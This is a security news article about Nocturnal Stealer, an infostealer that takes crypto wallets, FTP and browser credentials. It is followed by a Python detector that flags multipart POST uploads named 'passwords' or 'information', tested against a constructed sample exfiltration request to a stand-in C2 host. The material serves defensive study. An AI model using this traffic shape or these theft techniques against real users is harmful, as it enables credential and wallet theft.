Nocturnal Stealer malware harvests sensitive info

Nocturnal Stealer malware is sold through Deep Web sources for the low price of $25.

It targets 28 different kinds of cryptocurrency wallets, saved FileZilla FTP credentials, and Chrome and Firefox data, including logins, cookies, web data and autofill entries. It also reports detailed host information back to the attacker, including the victim's IP address, operating system, architecture and hardware details.

The malware uses anti-VM and anti-analysis techniques that make it harder for security researchers to dissect. Nocturnal Stealer writes the stolen data to plaintext files named "passwords" and "information", then opens a connection to its C2 server and uploads them in a multipart HTTP POST request.
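The exfiltration step above is the most visible thing the stealer does on the wire: a multipart/form-data POST carrying files named "passwords" and "information". The following is an added detection example, not code from the original article or from the malware's authors: it parses a captured HTTP request, walks the multipart parts and flags any part whose filename stem matches those loot-file names. The request body, the `/gate.php` path, the IP addresses and the file contents are all constructed for the example and are assumptions, not observed Nocturnal Stealer traffic.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Filenames the article says Nocturnal Stealer uses for its plaintext loot files.
# Matching is done on the stem only, so "passwords" and "passwords.txt" both hit.
SUSPECT_STEMS = {"passwords", "information"}


@dataclass
class Part:
    name: str                 # form field name from Content-Disposition
    filename: str | None      # filename= parameter, if the part is a file upload
    content_type: str | None
    body: bytes


def _param(header: str, key: str) -> str | None:
    """Pull a quoted parameter (name=, filename=) out of a header value.
    The lookbehind keeps name= from matching inside filename=."""
    m = re.search(rf'(?<![\w-]){key}="([^"]*)"', header)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> list[Part]:
    """Minimal multipart/form-data parser (RFC 7578 shape, no nested multiparts)."""
    delim = b"--" + boundary.encode()
    parts: list[Part] = []
    for chunk in body.split(delim)[1:]:      # [0] is the preamble, usually empty
        if chunk.startswith(b"--"):          # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):           # CRLF that precedes the next delimiter
            data = data[:-2]
        headers: dict[str, str] = {}
        for line in head.split(b"\r\n"):
            k, _, v = line.decode("latin-1").partition(":")
            headers[k.strip().lower()] = v.strip()
        disp = headers.get("content-disposition", "")
        parts.append(Part(_param(disp, "name") or "", _param(disp, "filename"),
                          headers.get("content-type"), data))
    return parts


def flag_stealer_upload(raw_request: bytes) -> list[str]:
    """Return the suspicious part names found in one captured HTTP request.
    An empty list means nothing matched (not a POST, not multipart, or clean)."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    request_line, headers = lines[0], {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    if not request_line.startswith("POST "):
        return []
    ctype = headers.get("content-type", "")
    m = re.search(r'boundary="?([^";]+)"?', ctype)
    if not ctype.lower().startswith("multipart/form-data") or not m:
        return []
    hits = []
    for part in parse_multipart(body, m.group(1)):
        label = part.filename or part.name
        # strip any directory prefix and extension before comparing the stem
        stem = label.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].split(".", 1)[0].lower()
        if stem in SUSPECT_STEMS:
            hits.append(label)
    return hits


# Constructed sample request (assumption: a gate.php-style C2 endpoint and
# plaintext loot formatted as key: value lines; neither is taken from the article).
BOUNDARY = "----NocturnalSample"
SAMPLE_REQUEST = (
    b"POST /gate.php HTTP/1.1\r\n"
    b"Host: 203.0.113.10\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=----NocturnalSample\r\n"
    b"\r\n"
    b"------NocturnalSample\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"URL: https://mail.example.net/login\r\nLogin: alice\r\nPassword: hunter2\r\n"
    b"\r\n"
    b"------NocturnalSample\r\n"
    b'Content-Disposition: form-data; name="file"; filename="information.txt"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"IP: 203.0.113.55\r\nOS: Windows 10 x64\r\n"
    b"\r\n"
    b"------NocturnalSample--\r\n"
)

if __name__ == "__main__":
    print(flag_stealer_upload(SAMPLE_REQUEST))   # ['passwords.txt', 'information.txt']
```

Filenames are a weak indicator on their own, since the operator can rename the parts with a one-line change; in practice this check is worth pairing with the C2 host or URL from the same capture and with the absence of a browser Referer on a multipart POST from a non-browser process. For live traffic, run the same logic behind a proper HTTP decoder (an IDS or proxy log) rather than on raw bytes.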

Once the data has been harvested and sent, the malware runs a simple command to delete itself from the victim machine, so the victim is unlikely to notice that their information has been compromised.

